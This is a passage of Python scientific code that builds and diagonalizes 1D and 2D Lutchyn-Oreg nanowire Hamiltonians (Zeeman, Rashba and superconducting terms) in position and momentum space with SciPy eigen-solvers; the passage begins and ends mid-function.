U[0:2 * N, 2 * N:4 * N] = U[2 * N:4 * N, 0:2 * N]
U[2 * N:4 * N, 2 * N:4 * N] = U[0:2 * N, 0:2 * N]
E,U=order_eig(E,U,sparse='no')
elif space=='momentum':
for i in range(n_k):
H_add[2 * (N - 1):2 * (N - 1) + 2, 0: 2] = np.array([[-1j*aRy[2], aRz[1]], [-aRz[1], +1j*aRy[2]]])*np.exp(-1j*k_vec[i]*N)
H_add[2 * (N - 1)+2*N:2 * (N - 1) + 2+2*N, 2*N: 2+2*N] = -np.array([[+1j*aRy[2], aRz[1]], [-aRz[1], -1j*aRy[2]]])*np.exp(1j*k_vec[i]*N)
H_add[0: 2, 2 * (N - 1):2 * (N - 1) + 2] = np.array([[+1j*aRy[2], -aRz[1]], [aRz[1], -1j*aRy[2]]])*np.exp(1j*k_vec[i]*N)
H_add[2*N: 2+2*N, 2 * (N - 1)+2*N:2 * (N - 1) + 2+2*N] = -np.array([[-1j*aRy[2], -aRz[1]], [aRz[1], +1j*aRy[2]]])*np.exp(-1j*k_vec[i]*N)
E[0:2 * N,i], U[0:4 * N, 0:2 * N,i] = scipy.linalg.eigh(H[:,:,i]+H_add, lower=False,eigvals=(2*N,4*N-1))
E[2*N:4*N,i]=-E[0:2*N,i]
U[0:2 * N, 2 * N:4 * N,i] = U[2 * N:4 * N, 0:2 * N,i]
U[2 * N:4 * N, 2 * N:4 * N,i] = U[0:2 * N, 0:2 * N,i]
E[:,i],U[:,:,i]=order_eig(E[:,i],U[:,:,i],sparse='no')
else:
if space=='position':
E, U = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H+H_add),k = n_eig,sigma=0, which='LM',tol=1e-5)
E,U=order_eig(E,U,sparse='yes')
elif space=='momentum':
H_k= scipy.sparse.dok_matrix((4*N,4*N),dtype=complex)
for i in range(n_k):
H_k = (H+H_add).copy()
H_k[0: 2, 2 * (N - 1):2 * (N - 1) + 2] += H_k[2:4, 0: 2]*np.exp(-1j*k_vec[i]*N)
H_k[2 * (N - 1):2 * (N - 1) + 2, 0: 2] += H_k[0:2,2:4]*np.exp(1j*k_vec[i]*N)
H_k[2*N: 2+2*N, 2 * (N - 1)+2*N:2 * (N - 1) + 2+2*N] = -(np.conj(H_k[0: 2, 2 * (N - 1):2 * (N - 1) + 2]))
H_k[2 * (N - 1)+2*N:2 * (N - 1) + 2+2*N, 2*N: 2+2*N] = -(np.conj(H_k[2 * (N - 1):2 * (N - 1) + 2, 0: 2]))
E[:,i], U[:,:,i] = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig,sigma=0, which='LM',tol=1e-5)
E[:,i], U[:,:,i]=order_eig(E[:,i], U[:,:,i],sparse='yes')
#Return the eigenspectra:
return (E), (U)
#%%
def LO_1D_solver_NoSC(H,N,dis,
                      mu=0,B=0,aR=0,
                      space='position',k_vec=0,
                      sparse='no',n_eig=None,near=None):
    """
    1D Lutchyn-Oreg Hamiltonian solver without superconductivity. It solves
    the Hamiltonian (built with Lutchyn_builder) of a 1D Lutchyn-Oreg chain.

    Parameters
    ----------
    H: arr
        Discretized 1D Lutchyn-Oreg Hamiltonian built with Lutchyn_builder.
    N: int
        Number of sites.
    dis: int
        Distance (in nm) between sites.
    mu: float or arr
        On-site chemical potential. If it is a float, the chemical potential
        is the same in every site, while if it is a 1D array, it is the
        on-site chemical potential.
    B: float or arr
        Zeeman splitting.
        -If B is a float, the same constant B is added in the x direction
        in each site and in every diagonalization step.
        -If B is a 1D array of length=3, each element of the array is the
        (constant) Zeeman splitting in each direction, which is added in
        every diagonalization step.
    aR: float or arr
        Rashba coupling.
        -If aR is a float, the same constant aR is added in the z direction
        in each site and in every diagonalization step.
        -If aR is a 1D array of length=3, each element of the array is the
        (constant) Rashba coupling in each direction, which is added in
        every diagonalization step.
        -If aR is a 2D array (3 x N), each element of the array aR[i] is
        the Rashba coupling in each direction, whose matrix elements are
        the on-site Rashba couplings.
    space: {"position","momentum"}
        Space in which the Hamiltonian is built. "position" means real
        space (r-space) with open boundary conditions. "momentum" means
        reciprocal space (k-space): the Hamiltonian of the unit cell with
        periodic boundary conditions along the x-direction.
    k_vec: arr
        If space=='momentum', k_vec is the (discretized) momentum vector,
        usually in the First Brillouin Zone.
    sparse: {"yes","no"}
        Sparsity of the Hamiltonian. "yes" diagonalizes a sparse matrix
        (scipy.sparse.linalg.eigsh), while "no" diagonalizes a dense one
        (scipy.linalg.eigh).
    n_eig: int
        If sparse=="yes", the number of (lowest-energy) eigenvalues to
        obtain. If None, it defaults to the full spectrum size 2*N.
    near: float
        Unused in this solver; kept for interface compatibility with the
        other LO solvers in this module.

    Returns
    -------
    E: arr (n_eig) or (n_eig x n_k)
        Eigenvalues (energies), ordered from smaller to larger.
    U: arr ((2 x N) x n_eig) or ((2 x N) x n_eig x n_k)
        Eigenvectors of the system with the same ordering.
    """

    #Make sure that the onsite parameters are arrays:
    if np.isscalar(mu) and not(mu==0):
        mu = mu * np.ones(N)

    if np.isscalar(B) and not(B==0):
        #A scalar Zeeman field points along x:
        Bx=B
        By=0
        Bz=0
        Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
    elif np.ndim(B)==1:
        Bx=B[0]
        By=B[1]
        Bz=B[2]
        Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)

    #Rashba couplings divided by (2*dis) give the hopping amplitudes:
    if np.ndim(aR)==0:
        aRy=np.zeros(N)
        aRz=aR*np.ones(N)/(2*dis)
    elif np.ndim(aR)==1:
        if len(aR)==3:
            aRy=aR[1]*np.ones(N)/(2*dis)
            aRz=aR[2]*np.ones(N)/(2*dis)
        else:
            aRy=np.zeros(N)
            aRz=aR/(2*dis)
    else:
        aRy=aR[1]/(2*dis)
        aRz=aR[2]/(2*dis)

    #The momentum grid is only needed when diagonalizing in k-space.
    #(Bug fix: this previously tested space=='position', which crashed on
    #len(k_vec) with the scalar default k_vec=0 in position-space runs and
    #left n_k undefined for momentum-space runs.)
    if space=='momentum' or space=='position2momentum':
        n_k=len(k_vec)

    #Store matrices:
    if n_eig is None:
        n_eig=2*N
    if space=='position':
        E = np.empty([int(n_eig)])
        U = np.empty([2*N,int(n_eig)],dtype=complex)
    elif space=='momentum' or space=='position2momentum':
        E = np.empty([int(n_eig),n_k])
        U = np.empty([2*N,int(n_eig),n_k],dtype=complex)

    if sparse=='no':
        H_add=np.zeros((2*N,2*N),dtype=complex)
    else:
        if not(scipy.sparse.issparse(H)):
            H = scipy.sparse.dok_matrix(H)
        H_add=scipy.sparse.dok_matrix((2*N,2*N),dtype=complex)

    #Obtain the add-values Hamiltonian (terms added on top of H):
    if not(np.isscalar(mu)):
        e=-mu
        H_add[diagonal(2*N)]=np.repeat(e,2)
    if not(np.isscalar(B) and B==0):
        Bz,Bx,By=np.repeat(Bz,2),np.repeat(Bx,2), 1j*np.repeat(By,2)
        Bx[1::2], By[1::2], Bz[1::2] = 0, 0, -Bz[::2]
        H_add[diagonal(2*N,k=1)], H_add[diagonal(2*N,k=-1)] = Bx[:-1]-By[:-1], Bx[:-1]+By[:-1]
        H_add[diagonal(2*N)]+=Bz
    if not((aRy==0).all() and (aRz==0).all()):
        aRy=-1j*np.repeat(aRy,2)
        aRy[1::2]= -aRy[::2]
        H_add[diagonal(2*N,k=-2)], H_add[diagonal(2*N,k=2)] = -aRy[2::], aRy[2::]
        H_add[diagonal(2*N,k=1,step=2,init=1)] += -aRz[1::]
        H_add[diagonal(2*N,k=-1,step=2,init=1)] += -aRz[1::]
        H_add[diagonal(2*N,k=3,step=2)] += aRz[1::]
        H_add[diagonal(2*N,k=-3,step=2)] += aRz[1::]

    #Diagonalize the Hamiltonian:
    if sparse=='no':
        if space=='position':
            E, U= scipy.linalg.eigh(H+H_add, lower=False)
            E,U=order_eig(E,U,sparse='no')
        elif space=='momentum':
            for i in range(n_k):
                #Boundary hoppings closing the chain, with the Bloch phase:
                H_add[2 * (N - 1):2 * (N - 1) + 2, 0: 2] = np.array([[-1j*aRy[2], aRz[1]], [-aRz[1], +1j*aRy[2]]])*np.exp(-1j*k_vec[i]*N)
                H_add[0: 2, 2 * (N - 1):2 * (N - 1) + 2] = np.array([[+1j*aRy[2], -aRz[1]], [aRz[1], -1j*aRy[2]]])*np.exp(1j*k_vec[i]*N)
                E[:,i], U[:,:,i] = scipy.linalg.eigh(H[:,:,i]+H_add, lower=False)
                E[:,i],U[:,:,i]=order_eig(E[:,i],U[:,:,i],sparse='no')
    else:
        if space=='position':
            E, U = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H+H_add),k = n_eig, which='SA',tol=1e-5)
            E,U=order_eig(E,U,sparse='yes',BdG='no')
        elif space=='momentum':
            H_k= scipy.sparse.dok_matrix((2*N,2*N),dtype=complex)
            for i in range(n_k):
                H_k = (H+H_add).copy()
                #Fold the nearest-neighbor hoppings around the boundary:
                H_k[0: 2, 2 * (N - 1):2 * (N - 1) + 2] += H_k[2:4, 0: 2]*np.exp(-1j*k_vec[i]*N)
                H_k[2 * (N - 1):2 * (N - 1) + 2, 0: 2] += H_k[0:2,2:4]*np.exp(1j*k_vec[i]*N)
                E[:,i], U[:,:,i] = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig, which='SA',tol=1e-5)
                E[:,i], U[:,:,i]=order_eig(E[:,i], U[:,:,i],sparse='yes',BdG='no')

    return (E), (U)
#%%
def LO_2D_solver(H,N,dis,m_eff=0.023,
                 mu=0,B=0,aR=0,d=0,
                 space='position',k_vec=0,
                 sparse='yes',n_eig=None,near=None,
                 section='rectangular'):
    """
    2D Lutchyn-Oreg Hamiltonian solver with superconductivity. It solves
    the Hamiltonian (built with Lutchyn_builder) of a 2D Lutchyn-Oreg
    cross-section in the Bogoliubov-de Gennes (BdG) basis.

    Parameters
    ----------
    H: arr
        Discretized 2D Lutchyn-Oreg Hamiltonian built with Lutchyn_builder.
    N: arr
        Number of sites in each direction (Ny, Nz).
    dis: arr or int
        Distance (in nm) between sites.
    m_eff: float or arr
        Effective mass (used for the kx kinetic term in momentum space).
    mu: float or arr
        On-site chemical potential. If it is a float, the chemical potential
        is the same in every site, while if it is a 2D array, it is the
        on-site chemical potential.
    B: float or arr
        Zeeman splitting.
        -If B is a float, the same constant B is added in the x direction
        in each site and in every diagonalization step.
        -If B is a 1D array of length=3, each element of the array is the
        (constant) Zeeman splitting in each direction, which is added in
        every diagonalization step.
    aR: float or arr
        Rashba coupling.
        -If aR is a float, the same constant aR is added in the z direction
        in each site and in every diagonalization step.
        -If aR is a 1D array of length=3, each element of the array is the
        (constant) Rashba coupling in each direction, which is added in
        every diagonalization step.
        -If aR is a 3D array (3 x Ny x Nz), each element of the array aR[i]
        is the Rashba coupling in each direction, whose matrix elements
        are the on-site Rashba couplings.
    d: float or arr
        On-site superconductivity. If it is a float, the SC pairing
        amplitude is the same in every site, while if it is a 2D array,
        it is the on-site superconductivity.
    space: {"position","momentum"}
        Space in which the Hamiltonian is built. "position" means real
        space (open boundary conditions), while "momentum" means the unit
        cell with periodic boundary conditions along the x-direction.
    k_vec: arr
        If space=='momentum', k_vec is the (discretized) momentum vector,
        usually in the First Brillouin Zone.
    sparse: {"yes","no"}
        Sparsity of the Hamiltonian. "yes" diagonalizes a sparse matrix,
        while "no" diagonalizes a dense one.
    n_eig: int
        If sparse=="yes", the number of eigenvalues to obtain, found
        around zero energy (BdG spectrum).
    near: float
        Unused in this (BdG) solver; kept for interface compatibility.
    section: {"rectangular","hexagonal"}
        Whether the system has a rectangular or hexagonal cross-section
        in the zy plane.

    Returns
    -------
    E: arr (n_eig) or (n_eig x n_k)
        Eigenvalues (energies), ordered from smaller to larger.
    U: arr (m x n_eig) or (m x n_eig x n_k), with m = 4*Ny*Nz
        Eigenvectors of the system with the same ordering.
    """

    #Obtain the dimensions:
    Ny, Nz = N[0], N[1]
    if np.ndim(dis)==0:
        dis_y, dis_z = dis, dis
    else:
        dis_y, dis_z = dis[0], dis[1]
    #Full BdG dimension: 2 (spin) x 2 (particle-hole) x Ny x Nz.
    m = int(4 * Ny * Nz)
    if (np.isscalar(section) and not(section=='rectangular')) or not(np.isscalar(section)):
        m_hex=H_rec2shape(0,section,N,dis,BdG='yes',output='m')
    if (space=='momentum'):
        n_k=len(k_vec)
    if sparse=='no':
        n_eig=m

    #Make sure that the onsite parameters are arrays:
    if space=='momentum':
        if np.isscalar(m_eff):
            m_eff = m_eff * np.ones((Ny,Nz))
        m_eff=m_eff.flatten()
    if np.isscalar(mu) and not(mu==0):
        mu = mu * np.ones((Ny,Nz))
    if np.isscalar(B) and not(B==0):
        Bx=B
        By=0
        Bz=0
        Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
    elif np.ndim(B)==1:
        Bx=B[0]
        By=B[1]
        Bz=B[2]
        Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
    if np.ndim(aR)==0:
        aRx=np.zeros(N)
        aRy=np.zeros(N)
        aRz=aR*np.ones(N)
    elif np.ndim(aR)==1:
        if len(aR)==3:
            aRx=aR[0]*np.ones(N)
            aRy=aR[1]*np.ones(N)
            aRz=aR[2]*np.ones(N)
        else:
            aRx=np.zeros(N)
            aRy=np.zeros(N)
            aRz=aR*np.ones(N)
    else:
        aRx=aR[0]
        aRy=aR[1]
        aRz=aR[2]
    if np.isscalar(d) and not(d==0):
        d = d * np.ones(N)

    #Store matrices:
    if space=='position':
        E = np.empty([int(n_eig)])
        U = np.empty([m,int(n_eig)],dtype=complex)
    elif space=='momentum':
        E = np.empty([int(n_eig),n_k])
        U = np.empty([m,int(n_eig),n_k],dtype=complex)

    if sparse=='no':
        H_add=np.zeros((m,m),dtype=complex)
    else:
        if not(scipy.sparse.issparse(H)):
            H = scipy.sparse.dok_matrix(H,dtype=complex)
        H_add=scipy.sparse.dok_matrix((m,m),dtype=complex)

    #Obtain the add-values Hamiltonian (electron block i=0, hole block i=1):
    if not(np.isscalar(mu)):
        e=-mu
        e=e.flatten()
        for i in range(2):
            H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i)] = (-1)**(i)*(np.repeat(e,2))
    if not(np.isscalar(B) and B==0):
        Bx,By,Bz=Bx.flatten(),By.flatten(),Bz.flatten()
        Bz=np.repeat(Bz,2)
        Bz[1::2] = -Bz[::2]
        for i in range(2):
            H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=1,step=2)], H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-1,step=2)] = (-1)**(i)*Bx-1j*By, (-1)**(i)*Bx+1j*By
            H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i)] += (-1)**(i)*(Bz)
    if not((aRx==0).all() and (aRy==0).all() and (aRz==0).all()):
        #Average the Rashba couplings between neighboring sites to build
        #the hoppings along y (ky terms) and z (kz terms):
        aRx_ky, aRz_ky = np.repeat(((aRx[1::,:]+aRx[:-1,:])/(4*dis_y)).flatten(),2), ((aRz[1::,:]+aRz[:-1,:])/(4*dis_y)).flatten()
        aRx_kz, aRy_kz = ((aRx[:,1::]+aRx[:,:-1])/(4*dis_z)).flatten(), ((aRy[:,1::]+aRy[:,:-1])/(4*dis_z)).flatten()
        aRx_ky[1::2] = -aRx_ky[::2]
        #Insert zeros to break the spurious hopping between the last site
        #of one row and the first site of the next one:
        aRx_kz, aRy_kz = np.insert(aRx_kz,np.arange((Nz-1),(Nz-1)*Ny,(Nz-1)),np.zeros((Ny-1))), np.insert(aRy_kz,np.arange((Nz-1),(Nz-1)*Ny,(Nz-1)),np.zeros((Ny-1)))
        for i in range(2):
            H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=2*Nz)] = 1j*aRx_ky
            H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-2*Nz)] = -1j*aRx_ky
            H_add[diagonal(int(m/2)*(i+1),k=2*Nz-1,step=2,init=1+int(m/2)*i)] += -1j*aRz_ky
            H_add[diagonal(int(m/2)*(i+1),k=-2*Nz+1,step=2,init=1+int(m/2)*i)] += 1j*aRz_ky
            H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=1+2*Nz,step=2)] += -1j*aRz_ky
            H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-1-2*Nz,step=2)] += 1j*aRz_ky
            H_add[diagonal(int(m/2)*(i+1),k=1,step=2,init=1+int(m/2)*i)] += (-1)**(i)*aRx_kz+1j*aRy_kz
            H_add[diagonal(int(m/2)*(i+1),k=-1,step=2,init=1+int(m/2)*i)] += (-1)**(i)*aRx_kz-1j*aRy_kz
            H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=3,step=2)] += -1*(-1)**(i)*aRx_kz+1j*aRy_kz
            H_add[diagonal(int(m/2)*(i+1),init=int(m/2)*i,k=-3,step=2)] += -1*(-1)**(i)*aRx_kz-1j*aRy_kz
    if not(np.isscalar(d)):
        #Superconducting pairing (electron-hole coupling blocks):
        d=d.flatten()
        H_add[diagonal(m,k=int(m/2)+1,step=2)], H_add[diagonal(m,k=-int(m/2)-1,step=2)] = -np.conj(d), -d
        H_add[diagonal(m,k=int(m/2)-1,step=2,init=1)], H_add[diagonal(m,k=-int(m/2)+1,step=2,init=1)] = np.conj(d), d

    #Diagonalize the Hamiltonian:
    if sparse=='no':
        #NOTE(review): this dense branch was flagged "revisar" by the
        #original author. The eigvals bounds were (2*N,4*N-1), which is
        #invalid here since N is an array; by parallel with the 1D BdG
        #solver they must select the upper half of the m x m spectrum,
        #i.e. (int(m/2), m-1). Fixed accordingly.
        if space=='position':
            E[0:int(m/2)], U[0:m, 0:int(m/2)] = scipy.linalg.eigh(H+H_add, lower=False,eigvals=(int(m/2),m-1))
            #Use particle-hole symmetry to fill the negative-energy half:
            E[int(m/2):m]=-E[0:int(m/2)]
            U[0:int(m/2), int(m/2):m] = U[int(m/2):m, 0:int(m/2)]
            U[int(m/2):m, int(m/2):m] = U[0:int(m/2), 0:int(m/2)]
            E,U=order_eig(E,U,sparse='no')
        elif space=='momentum':
            aRy, aRz = aRy.flatten(), aRz.flatten()
            aRy=np.repeat(aRy,2)
            aRy[1::2] = -aRy[::2]
            for i in range(n_k):
                #Add the kx-dependent terms for this momentum point:
                for j in range(2):
                    H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j)] += (-1)**(j)*np.repeat(cons.hbar**2/(2*m_eff*cons.m_e*(1e-9)**2)/cons.e*1e3*k_vec[i]**2,2)
                    H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j)] += -1*aRy*k_vec[i]
                    H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=1,step=2)] += -1j*(-1)**(j)*aRz*k_vec[i]
                    H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=-1,step=2)] += 1j*(-1)**(j)*aRz*k_vec[i]
                E[0:int(m/2),i], U[0:m, 0:int(m/2),i] = scipy.linalg.eigh(H+H_add, lower=False,eigvals=(int(m/2),m-1))
                E[int(m/2):m,i]=-E[0:int(m/2),i]
                U[0:int(m/2), int(m/2):m,i] = U[int(m/2):m, 0:int(m/2),i]
                U[int(m/2):m, int(m/2):m,i] = U[0:int(m/2), 0:int(m/2),i]
                E[:,i],U[:,:,i]=order_eig(E[:,i],U[:,:,i],sparse='no')
                #Undo the kx-dependent terms before the next momentum point:
                for j in range(2):
                    H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j)] -= (-1)**(j)*np.repeat(cons.hbar**2/(2*m_eff*cons.m_e*(1e-9)**2)/cons.e*1e3*k_vec[i]**2,2)
                    H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j)] -= -1*aRy*k_vec[i]
                    H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=1,step=2)] -= -1j*(-1)**(j)*aRz*k_vec[i]
                    H_add[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=-1,step=2)] -= 1j*(-1)**(j)*aRz*k_vec[i]
    else:
        if space=='position':
            if np.isscalar(section) and section=='rectangular':
                #Shift-invert around zero energy to target the BdG gap:
                E, U = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H+H_add),k = n_eig,sigma=0, which='LM',tol=1e-4)
                E, U=order_eig(E, U,sparse='yes')
            else:
                H=H_rec2shape(H+H_add,section,N,dis,BdG='yes',output='H',m=m_hex)
                E, U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H),k = n_eig, which='LM',sigma=0,tol=1e-9)
                E,U_hex=order_eig(E,U_hex,sparse='yes',BdG='yes')
                U=U_shape2rec(U_hex,section,N,dis,BdG='yes')
        elif space=='momentum':
            H_k= scipy.sparse.dok_matrix((m,m),dtype=complex)
            aRy, aRz = aRy.flatten(), aRz.flatten()
            aRy=np.repeat(aRy,2)
            aRy[1::2] = -aRy[::2]
            for i in range(n_k):
                H_k = (H+H_add).copy()
                #Add the kx-dependent terms for this momentum point:
                for j in range(2):
                    H_k[diagonal(int(m/2)*(j+1),init=int(m/2)*j)] += (-1)**(j)*np.repeat(cons.hbar**2/(2*m_eff*cons.m_e*(1e-9)**2)/cons.e*1e3*k_vec[i]**2,2)
                    H_k[diagonal(int(m/2)*(j+1),init=int(m/2)*j)] += -1*aRy*k_vec[i]
                    H_k[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=1,step=2)] += -1j*(-1)**(j)*aRz*k_vec[i]
                    H_k[diagonal(int(m/2)*(j+1),init=int(m/2)*j,k=-1,step=2)] += 1j*(-1)**(j)*aRz*k_vec[i]
                if np.isscalar(section) and section=='rectangular':
                    E[:,i], U[:,:,i] = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig,sigma=0, which='LM',tol=1e-5)
                    E[:,i], U[:,:,i]=order_eig(E[:,i], U[:,:,i],sparse='yes')
                else:
                    H_k=H_rec2shape(H_k,section,N,dis,BdG='yes',output='H',m=m_hex)
                    E[:,i], U_hex = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_k),k = n_eig, which='LM',sigma=0,tol=1e-9)
                    E[:,i],U_hex=order_eig(E[:,i],U_hex,sparse='yes',BdG='yes')
                    U[:,:,i]=U_shape2rec(U_hex,section,N,dis,BdG='yes')

    return (E), (U)
#%%
def LO_2D_solver_NoSC(H,N,dis,m_eff=0.023,
                      mu=0,B=0,aR=0,
                      space='position',k_vec=0,
                      sparse='yes',n_eig=None,near=None,
                      section='rectangular'):
    """
    2D Lutchyn-Oreg Hamiltonian solver without superconductivity. It solves
    the Hamiltonian (built with Lutchyn_builder) of a 2D Lutchyn-Oreg
    cross-section.

    Parameters
    ----------
    H: arr
        Discretized 2D Lutchyn-Oreg Hamiltonian built with Lutchyn_builder.
    N: arr
        Number of sites in each direction (Ny, Nz).
    dis: arr or int
        Distance (in nm) between sites.
    m_eff: float or arr
        Effective mass (used for the kx kinetic term in momentum space).
    mu: float or arr
        On-site chemical potential. If it is a float, the chemical potential
        is the same in every site, while if it is a 2D array, it is the
        on-site chemical potential.
    B: float or arr
        Zeeman splitting.
        -If B is a float, the same constant B is added in the x direction
        in each site and in every diagonalization step.
        -If B is a 1D array of length=3, each element of the array is the
        (constant) Zeeman splitting in each direction, which is added in
        every diagonalization step.
    aR: float or arr
        Rashba coupling.
        -If aR is a float, the same constant aR is added in the z direction
        in each site and in every diagonalization step.
        -If aR is a 1D array of length=3, each element of the array is the
        (constant) Rashba coupling in each direction, which is added in
        every diagonalization step.
        -If aR is a 3D array (3 x Ny x Nz), each element of the array aR[i]
        is the Rashba coupling in each direction, whose matrix elements
        are the on-site Rashba couplings.
    space: {"position","momentum"}
        Space in which the Hamiltonian is built. "position" means real
        space (open boundary conditions), while "momentum" means the unit
        cell with periodic boundary conditions along the x-direction.
    k_vec: arr
        If space=='momentum', k_vec is the (discretized) momentum vector,
        usually in the First Brillouin Zone.
    sparse: {"yes","no"}
        Sparsity of the Hamiltonian. "yes" diagonalizes a sparse matrix,
        while "no" diagonalizes a dense one.
    n_eig: int
        If sparse=="yes", the number of lowest-energy eigenvalues to
        obtain. This can be changed with the near option.
    near: float
        If sparse=="yes", near provides the value around which the
        eigenvalues must be found.
    section: {"rectangular","hexagonal"}
        Whether the system has a rectangular or hexagonal cross-section
        in the zy plane.

    Returns
    -------
    E: arr (n_eig) or (n_eig x n_k)
        Eigenvalues (energies), ordered from smaller to larger.
    U: arr (m x n_eig) or (m x n_eig x n_k), with m = 2*Ny*Nz
        Eigenvectors of the system with the same ordering.
    """

    #Obtain the dimensions:
    Ny, Nz = N[0], N[1]
    if np.ndim(dis)==0:
        dis_y, dis_z = dis, dis
    else:
        dis_y, dis_z = dis[0], dis[1]
    #Full dimension: 2 (spin) x Ny x Nz (no particle-hole doubling).
    m = int(2 * Ny * Nz)
    if (np.isscalar(section) and not(section=='rectangular')) or not(np.isscalar(section)):
        m_hex=H_rec2shape(0,section,N,dis,BdG='no',output='m')
    if (space=='momentum'):
        n_k=len(k_vec)
    if sparse=='no':
        n_eig=m

    #Make sure that the onsite parameters are arrays:
    if space=='momentum':
        if np.isscalar(m_eff):
            m_eff = m_eff * np.ones((Ny,Nz))
        m_eff=m_eff.flatten()
    if np.isscalar(mu) and not(mu==0):
        mu = mu * np.ones((Ny,Nz))
    if np.isscalar(B) and not(B==0):
        Bx=B
        By=0
        Bz=0
        Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
    elif np.ndim(B)==1:
        Bx=B[0]
        By=B[1]
        Bz=B[2]
        Bx,By,Bz=Bx*np.ones(N),By*np.ones(N),Bz*np.ones(N)
    if np.ndim(aR)==0:
        aRx=np.zeros(N)
        aRy=np.zeros(N)
        aRz=aR*np.ones(N)
    elif np.ndim(aR)==1:
        if len(aR)==3:
            aRx=aR[0]*np.ones(N)
            aRy=aR[1]*np.ones(N)
            aRz=aR[2]*np.ones(N)
        else:
            aRx=np.zeros(N)
            aRy=np.zeros(N)
            aRz=aR*np.ones(N)
    else:
        aRx=aR[0]
        aRy=aR[1]
        aRz=aR[2]

    #Store matrices:
    if space=='position':
        E = np.empty([int(n_eig)])
        U = np.empty([m,int(n_eig)],dtype=complex)
    elif space=='momentum':
        E = np.empty([int(n_eig),n_k])
        U = np.empty([m,int(n_eig),n_k],dtype=complex)

    if sparse=='no':
        H_add=np.zeros((m,m),dtype=complex)
    else:
        if not(scipy.sparse.issparse(H)):
            H = scipy.sparse.dok_matrix(H,dtype=complex)
        H_add=scipy.sparse.dok_matrix((m,m),dtype=complex)

    #Obtain the add-values Hamiltonian (terms added on top of H):
    if not(np.isscalar(mu)):
        e=-mu
        e=e.flatten()
        H_add[diagonal(m)] = np.repeat(e,2)
    if not(np.isscalar(B) and B==0):
        Bx,By,Bz=Bx.flatten(),By.flatten(),Bz.flatten()
        Bz=np.repeat(Bz,2)
        Bz[1::2] = -Bz[::2]
        H_add[diagonal(m,k=1,step=2)], H_add[diagonal(m,k=-1,step=2)] = Bx-1j*By, Bx+1j*By
        H_add[diagonal(m)] += Bz
    if not((aRx==0).all() and (aRy==0).all() and (aRz==0).all()):
        #Average the Rashba couplings between neighboring sites to build
        #the hoppings along y (ky terms) and z (kz terms):
        aRx_ky, aRz_ky = np.repeat(((aRx[1::,:]+aRx[:-1,:])/(4*dis_y)).flatten(),2), ((aRz[1::,:]+aRz[:-1,:])/(4*dis_y)).flatten()
        aRx_kz, aRy_kz = ((aRx[:,1::]+aRx[:,:-1])/(4*dis_z)).flatten(), ((aRy[:,1::]+aRy[:,:-1])/(4*dis_z)).flatten()
        aRx_ky[1::2] = -aRx_ky[::2]
        H_add[diagonal(m,k=2*Nz)] = 1j*aRx_ky
        H_add[diagonal(m,k=-2*Nz)] = -1j*aRx_ky
        H_add[diagonal(m,k=2*Nz-1,step=2,init=1)] += -1j*aRz_ky
        H_add[diagonal(m,k=-2*Nz+1,step=2,init=1)] += 1j*aRz_ky
        H_add[diagonal(m,k=1+2*Nz,step=2)] += -1j*aRz_ky
        H_add[diagonal(m,k=-1-2*Nz,step=2)] += 1j*aRz_ky
        #Insert zeros to break the spurious hopping between the last site
        #of one row and the first site of the next one:
        aRx_kz, aRy_kz = np.insert(aRx_kz,np.arange((Nz-1),(Nz-1)*Ny,(Nz-1)),np.zeros((Ny-1))), np.insert(aRy_kz,np.arange((Nz-1),(Nz-1)*Ny,(Nz-1)),np.zeros((Ny-1)))
        H_add[diagonal(m,k=1,step=2,init=1)] += aRx_kz+1j*aRy_kz
        H_add[diagonal(m,k=-1,step=2,init=1)] += aRx_kz-1j*aRy_kz
        H_add[diagonal(m,k=3,step=2)] += -aRx_kz+1j*aRy_kz
        H_add[diagonal(m,k=-3,step=2)] += -aRx_kz-1j*aRy_kz

    #Diagonalize the Hamiltonian:
    if sparse=='no':
        if space=='position':
            if np.isscalar(section) and section=='rectangular':
                E, U = scipy.linalg.eigh(H+H_add, lower=False)
                E,U=order_eig(E,U,sparse='no',BdG='no')
            else:
                H=H_rec2shape(H+H_add,section,N,dis,BdG='no',output='H',m=m_hex)
                E, U_hex = scipy.linalg.eigh(H, lower=False)
                E,U_hex=order_eig(E,U_hex,sparse='no',BdG='no')
                U=U_shape2rec(U_hex,section,N,dis,BdG='no')
        elif space=='momentum':
            aRy, aRz = aRy.flatten(), aRz.flatten()
            aRy=np.repeat(aRy,2)
            aRy[1::2] = -aRy[::2]
            for i in range(n_k):
                #Add the kx-dependent terms for this momentum point:
                H_add[diagonal(m)] += np.repeat(cons.hbar**2/(2*m_eff*cons.m_e*(1e-9)**2)/cons.e*1e3*k_vec[i]**2,2)
                H_add[diagonal(m)] += -1*aRy*k_vec[i]
